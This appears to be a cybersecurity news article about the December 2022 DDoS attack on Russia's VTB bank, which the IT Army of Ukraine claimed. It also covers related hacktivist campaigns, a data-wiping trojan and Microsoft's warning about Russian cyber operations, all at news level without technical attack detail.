Russia’s second-largest bank experienced the largest cyber attack (**DDoS attack**) in its history. The government-controlled St Petersburg-based VTB financial institution announced on Tuesday that it was experiencing an “unprecedented cyber attack from abroad.”

The bank warned customers of temporary difficulties in accessing its mobile app and website due to the ongoing DDoS attack (distributed denial of service attack) but assured them that their data remained safe. VTB stores its customer data in the internal perimeter of its infrastructure which the attackers did not breach.

According to the bank’s internal analysis and as **reported** by local Russian media, this DDoS attack was pre-planned and orchestrated to cause hindrance in the bank’s functionalities and to inconvenience its customers. Despite the bank’s online portals being inaccessible, all other core banking services are operating as usual.  

VTB stated that they identified most of the malicious DDoS requests from “foreign segments of the internet,” but some network-flooding traffic also originated from Russian IP addresses which the bank noted was “of particular concern.” 

Either foreign actors used local proxies for some of the attacks or they managed to recruit local dissidents in their **DDoS campaign**. The bank stated that it will hand over all the information regarding the Russian IP addresses to law enforcement for criminal investigation. 

What makes this DDoS attack particularly interesting in light of the recent political events is that VTB is 61% state-owned, implying that the attackers made an indirect blow at the Russian government. 

On Dec 6, 2022, in a **tweet**, the pro-Ukraine hacktivist group, going by the name ‘IT Army of Ukraine,’ claimed responsibility for the DDoS attacks against VTB, announcing the campaign on Telegram and Twitter.

According to the IT Army of Ukraine, over 900 Russian entities, including stores selling military equipment and drones, the Central Bank of Russia, the National Center for the Development of Artificial Intelligence, and Alfa Bank, have been targeted by the group since they started being more active in November. 

It is worth noting that the IT Army of Ukraine along with the hacktivist group Anonymous also took responsibility for **September 2022’s social engineering attack** in which the Russian Yandex taxi app was hacked to cause a massive traffic jam in Moscow.

On the other hand, Microsoft **warns** Europe to be on alert for cyber attacks from Russia because this attack follows a series of cyber campaigns launched against Russian organizations. 

Last week, **reports of data-wiping trojan** deployed against Russian mayors’ and courts’ computers surfaced. The media reported that the wiper poses as ransomware and demands half a million rubles and deletes files regardless of whether the organization pays the amount or not. 

With the latest round of wiper and DDoS attacks, GM of Microsoft’s Digital Threat Analysis Centre Clint Watts warns Europe that Russia is likely to expand its “hybrid-war” efforts beyond Ukraine. He further stated that the Kremlin might use such state-sponsored attacks to disrupt foreign supply chains. 

European nations and the US should also brace for more Kremlin-backed influence operations – preying on citizens’ concerns about rising energy prices and inflation, and pushing pro-Russian narratives, Watts wrote. 

1.  **Anonymous Hacktivists Leak 1TB of Top Russian Law Firm Data**
2.  **Ukraine Busts Pro-Russia Hackers Who Stole 30M EU Citizens’ data**
3.  **OldGremlin Gang Known for Targeting Russia Launches Linux Malware**
4.  **Russian Ministry Website Hacked to Display “Glory To Ukraine” Message**
5.  **Ukraine Thwart Russian Industroyer 2 Malware Attack on Energy Provider**

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Tag

#intel